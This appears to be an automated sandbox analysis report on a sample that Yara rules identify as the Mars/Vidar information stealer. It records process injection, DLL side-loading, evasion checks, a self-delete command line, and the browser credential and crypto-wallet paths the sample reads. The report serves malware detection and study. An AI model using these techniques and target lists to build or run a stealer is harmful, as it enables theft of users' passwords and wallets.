                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,1_2_00415FC0
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Contains functionality to detect sleep reduction / modifications
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_004083701_2_00408370
                  Found evasive API chain (may stop execution after checking computer name)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_1-54079
                  Found evasive API chain (may stop execution after checking mutex)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-52806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60920C91 rdtsc 1_2_60920C91
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_004083701_2_00408370
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 6868Thread sleep count: 43 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00401280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00401090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040A150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,1_2_0040B570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00407620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B3A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6092A5DC sqlite3_os_init,GetSystemInfo,1_2_6092A5DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|5
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_1-52797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60920C91 rdtsc 1_2_60920C91
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_004054F0 VirtualProtect ?,00000004,00000100,000000001_2_004054F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00409220
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00415E60 mov eax, dword ptr fs:[00000030h]1_2_00415E60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00401000 mov eax, dword ptr fs:[00000030h]1_2_00401000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,1_2_00406040
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
                  DLL side loading technique detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: C:\ProgramData\nss3.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: C:\ProgramData\mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: C:\Windows\SysWOW64\vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: C:\Windows\SysWOW64\msvcp140.dllJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41E000Jump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 427000Jump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 439000Jump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43C000Jump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: B41008Jump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exe" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,1_2_0040CF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeQueries volume information: C:\Users\user\Desktop\4bVsmYiuXy.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040CE40 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_0040CE40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040CE00 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_0040CE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040CEA0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_0040CEA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_004084E0 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary,1_2_004084E0
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Mars stealer
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.32ceb10.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.13281908.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.32ceb10.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.132a9940.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.13281908.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1678526182.0000000000439000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632581206.000000000330A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1678526182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632682866.0000000013259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632581206.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.32ceb10.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.13281908.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.32ceb10.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.132a9940.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.13281908.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1678526182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632682866.0000000013259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6600, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \jaxx\Local Storage\
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \jaxx\Local Storage\
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file__0.localstorage
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default_wallet
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                  Source: Yara matchFile source: 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6600, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Mars stealer
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.32ceb10.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.13281908.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.32ceb10.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.132a9940.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.13281908.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1678526182.0000000000439000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632581206.000000000330A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1678526182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632682866.0000000013259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632581206.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.32ceb10.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.13281908.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.32ceb10.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.132a9940.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4bVsmYiuXy.exe.13281908.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1678526182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632682866.0000000013259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6600, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6090C1D6 sqlite3_clear_bindings,1_2_6090C1D6
